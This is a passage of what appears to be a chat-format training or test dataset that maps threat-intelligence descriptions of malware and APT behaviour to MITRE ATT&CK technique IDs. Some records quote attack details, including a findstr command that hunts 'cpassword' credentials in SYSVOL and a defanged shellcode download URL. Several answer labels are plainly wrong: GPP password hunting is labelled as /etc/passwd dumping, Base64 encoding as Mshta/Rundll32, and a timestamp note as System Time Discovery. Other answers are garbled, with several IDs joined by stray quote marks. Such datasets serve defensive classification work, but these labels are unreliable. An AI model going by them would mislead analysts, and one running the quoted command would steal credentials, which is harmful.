"content": "The s.exe (SHA256: 04f48ed27a83a57a971e73072ac5c769709306f2714022770fb364fd575fd462) uploaded to the error2.aspx webshell is a self-extracting 7-zip archive that is an example of the HyperBro backdoor. According to Kaspersky and SecureWorks research, HyperBro is a custom backdoor developed and used by Emissary Panda in their attack campaigns. This sample of HyperBro is similar to the sample discussed in Kaspersky’s research, specifically using a legitimate pcAnywhere application to sideload a DLL to decrypt, decompress and run a payload embedded within a file named ‘thumb.db’. Table 5 shows the three files associated with this HyperBro sample, which have the same file names as the self-extracting 7zip archives mentioned in Kaspersky’s blog (SHA256 hashes: 34a542356ac8a3f6e367c6827b728e18e905c71574b3813f163e043f70aa3bfa and 2144aa68c7b2a6e3511e482d6759895210cf60c67f14b9485a0236af925d8233" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HDoor scans to identify open ports on the victim." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malicious obfuscated VBA code is executed when the macro is first enabled" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence by creating the Registry key HKCU\\Software\\Microsoft\\Windows\\Run." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE has used .NET packer tools to evade detection." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The TAINTEDSCRIBE main executable has disguised itself as Microsoft’s Narrator." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a built-in utility command for netstat, can do net session through PowerView, and has an interactive shell which can be used to discover additional information." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nerex creates a Registry subkey that registers a new service." }, { "role": "assistant", "content": "T1112 - Modify Registry', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba can modify services by using the \"OpenService\" and \"ChangeServiceConfig\" functions." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2. Additionally, malware RoyalDNS has used DNS for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear can use thread injection to inject shellcode into the process of security software." }, { "role": "assistant", "content": "T1055.003 - Thread Execution Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects Keychain storage data and copies those passwords/tokens to a file." }, { "role": "assistant", "content": "T1555.001 - Credentials from Password Stores: Keychain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CSPY Downloader can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware. If they are installed, nothing will be dropped. We'll now break down the 5kplayer trojanized installer" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest uses the \"kill_unwanted\" function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL/TLS to encrypt the C2 traffic" }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A keylogging tool used by gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that can easily be decrypted. APT29 GPP password datamining C:\\WINDOWS\\system32\\cmd.exe /C findstr /S /I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml" }, { "role": "assistant", "content": "T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can enumerate and collect the properties of domain computers." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Victims receive spear phishing emails with attached malicious zip files - typically password protected or HTML file. That file contains an ISO file." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a collection of Privesc-PowerUp modules that can discover and exploit various path interception opportunities in services, processes, and variables." }, { "role": "assistant", "content": "T1034 - Path Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "esentutl can be used to read and write alternate data streams." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When required by the attacker, it is capable of remotely activating the microphone on the compromised computer and capturing sounds. The audio recordings are encoded to MP3 format using a legitimate lame.dll library, which is downloaded and misused by the malware" }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot had used `InstallUtil.exe` to download and deploy executables." }, { "role": "assistant", "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nefilim uses WerFault.exe and wermgr.exe for DLL Side Loading, a defense evasion technique used by adversaries to execute malicious payloads by hijacking the library manifest used to load DLLs. Werfault.exe is the Windows Error Reporting binary used by many different programs to report errors." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has the ability to download additional components and malware." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy has been installed via `msiexec.exe`." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PROMETHIUM has created self-signed certificates to sign malicious installers." }, { "role": "assistant", "content": "T1587.002 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dok prompts the user for credentials." }, { "role": "assistant", "content": "T1056.002 - Input Capture: GUI Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 removed evidence of email export requests using \"Remove-MailboxExportRequest\". They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MCMD has the ability to remove set Registry Keys, including those used for persistence." }, { "role": "assistant", "content": "T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "4H RAT has the capability to obtain file and directory listings." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named “vmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name ‘MSASCuiLTasks’ in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can utilize web services including Google sites to send and receive C2 data." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has leveraged \"rundll32.exe\" to execute malicious DLLs." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore can access the victim's webcam and capture data." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete used the startup folder for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sowbug has used credential dumping tools." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Nefilim ransomware queries volume information (disk volume name and serial number) and Cryptographic Machine GUID. Ransomware families use Cryptographic Machine GUID and volume serial number to generate a unique identifier for the host for encryption/decryption processes. Nefilim obtains Cryptographic Machine GUID by querying the value of MachineGuid in the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has executed a variety of PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder)." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sakula obfuscates many of its strings using single-byte XOR obfuscation. Samples with a 2012 compile timestamp use a key value of either 0x88 or 0x56. Samples compiled in 2013 and 2014 use a key value of 0x56, while the lone 2015 sample uses 0x57" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses scheduled tasks typically named \"Watchmon Service\" for persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 has configured payloads to load via LD_PRELOAD." }, { "role": "assistant", "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget)." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts." }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "decrypts resources needed for targeting the victim." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actor has the following demonstrated capabilities:To include exploits (for Hangul and Microsoft Office) in its workflows.To modify its campaigns by splitting the payload in to multiple stages To use compromised web servers or legitimate cloud based platforms" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon can decrypt encrypted data strings prior to using them." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XTunnel is capable of accessing locally stored passwords on victims." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 deployed rootkits on Linux systems." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "an extra executable; - process hollowing shellcode; - a list of predefined executable names, which the malware uses as a future process name" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact" }, { "role": "assistant", "content": "T1560 - Archive Collected Data', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used the Ammyy Admin tool as well as TeamViewer for remote access." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates." }, { "role": "assistant", "content": "T1649 - Steal or Forge Authentication Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can download files onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacSpy persists via a Launch Agent." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet can collect the computer name, RAM used, and operating system version from the victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RAR archiving – files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil – a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind – a command-line tool that can be used to perform Active Directory queries. Csvde – can be used to extract Active Directory files and data. Ntdsutil – can be used as a credential-dumping tool. WMIExec – can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors" }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Torisma can use HTTP and HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore can capture audio feeds from the system." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer used Tor nodes for C2." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.Similar to the \"Golden Time\" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.pngThe fake image usage is a common pattern for this group" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A possible explanation for this is that the document was copied to another system with an incorrectly set system time, then saved with the incorrect time" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used UPX to pack files." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amongst the downloaded files,  the fake .gif and .jpg files appear to be dependencies for the malware" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage" }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates. In December 2019, GOLD SOUTHFIELD began operating a name-and-shame style website that uses stolen data from intrusions to generate additional leverage against victims; a tactic known as double extortion. Despite GOLD 